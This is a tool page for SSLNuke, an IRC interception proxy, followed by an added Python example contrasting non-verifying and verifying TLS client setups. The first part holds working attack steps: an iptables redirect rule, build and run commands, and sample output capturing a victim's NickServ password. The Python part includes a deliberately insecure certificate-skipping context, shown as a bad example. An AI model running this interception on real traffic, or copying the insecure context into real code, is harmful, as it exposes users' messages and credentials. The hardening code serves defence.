SSLNuke - Tool For Intercepting & Decrypting Secure IRC Traffic


SSLNuke is a program designed for intercepting and decrypting "secured" but non-verified IRC traffic, meaning SSL connections where the client does not verify the server's certificate. It is basically a transparent proxy that decrypts SSL traffic and prints out IRC messages.

SSL without verification isn't secure at all!

Usage:

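First, add a user account for SSLNuke to run as, then add an iptables rule to redirect traffic to it. The rule exempts SSLNuke's own traffic by UID, so the UID in the rule (1000 here) must match the account's entry in /etc/passwd: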
# useradd -s /bin/bash -m sslnuke
# grep sslnuke /etc/passwd
sslnuke:x:1000:1000::/home/sslnuke:/bin/bash
# iptables -t nat -A OUTPUT -p tcp -m owner ! --uid-owner 1000 -m tcp \
  --dport 6697 --tcp-flags FIN,SYN,RST,ACK SYN -j REDIRECT --to-ports 4444

Finally, log in as the sslnuke user, then build and run SSLNuke:
# su -l sslnuke
# cd sslnuke
# make
# ./sslnuke

Run an IRC client and log in to your favorite IRC network using SSL. SSLNuke will print the IRC messages to stdout:
[*] Received connection from: 192.168.0.5:58007
[*] Opening connection to: 1.1.1.1:6697
[*] Connection Using SSL!
[*] irc.com -> AUTH (1.1.1.1): *** Looking up your hostname...
[*] irc.com -> AUTH (1.1.1.1): *** Found your hostname
[*] irc.com -> victim (1.1.1.1): *** You are connected to irc.vps-heaven.com with
                                   TLSv1.2-AES256-GCM-SHA384-256bits
[*] 192.168.0.5 -> nickserv (192.168.0.5): id hello
[*] NickServ!services@irc.com -> victim (1.1.1.1): Password accepted - you are now
                                                      recognized.
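
The interception shown above only works against a client that accepts any certificate. The following added example (not part of SSLNuke or the original post) puts that weak client-side TLS setup beside a verifying one in Python, with an optional SHA-256 fingerprint pin on top of CA validation; all function names are hypothetical.

```python
# Added illustration; function names are hypothetical, not part of SSLNuke.
import hashlib
import hmac
import socket
import ssl

def unverified_context() -> ssl.SSLContext:
    """The weak client setup: encrypts, but accepts any certificate."""
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    ctx.check_hostname = False          # must be cleared before CERT_NONE
    ctx.verify_mode = ssl.CERT_NONE
    return ctx

def verified_context() -> ssl.SSLContext:
    """Hardened setup: chain validation against system CAs plus hostname match."""
    ctx = ssl.create_default_context()
    ctx.minimum_version = ssl.TLSVersion.TLSv1_2
    return ctx

def audit_context(ctx: ssl.SSLContext) -> list:
    """Return the reasons a context would accept an interposed proxy's certificate."""
    findings = []
    if ctx.verify_mode != ssl.CERT_REQUIRED:
        findings.append("certificate chain is not validated")
    if not ctx.check_hostname:
        findings.append("certificate is not matched against the server name")
    return findings

def pin_matches(der_cert: bytes, pinned_sha256_hex: str) -> bool:
    """Constant-time comparison of a certificate's SHA-256 fingerprint with a pin."""
    actual = hashlib.sha256(der_cert).hexdigest()
    expected = pinned_sha256_hex.replace(":", "").lower()
    return hmac.compare_digest(actual, expected)

def connect_irc_tls(host: str, port: int = 6697, pin: str = None) -> ssl.SSLSocket:
    """Open a verified TLS connection; refuse if anything about the peer is off."""
    ctx = verified_context()
    if audit_context(ctx):
        raise ssl.SSLError("refusing to use a non-verifying TLS context")
    raw = socket.create_connection((host, port), timeout=10)
    try:
        # Raises ssl.SSLCertVerificationError if the chain or hostname check fails.
        tls = ctx.wrap_socket(raw, server_hostname=host)
    except Exception:
        raw.close()
        raise
    if pin and not pin_matches(tls.getpeercert(binary_form=True), pin):
        tls.close()
        raise ssl.SSLError("server certificate does not match the pinned fingerprint")
    return tls
```

With the verifying context, the handshake fails as soon as a proxy presents a certificate that does not chain to a trusted CA for the requested hostname, so no IRC traffic is sent.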



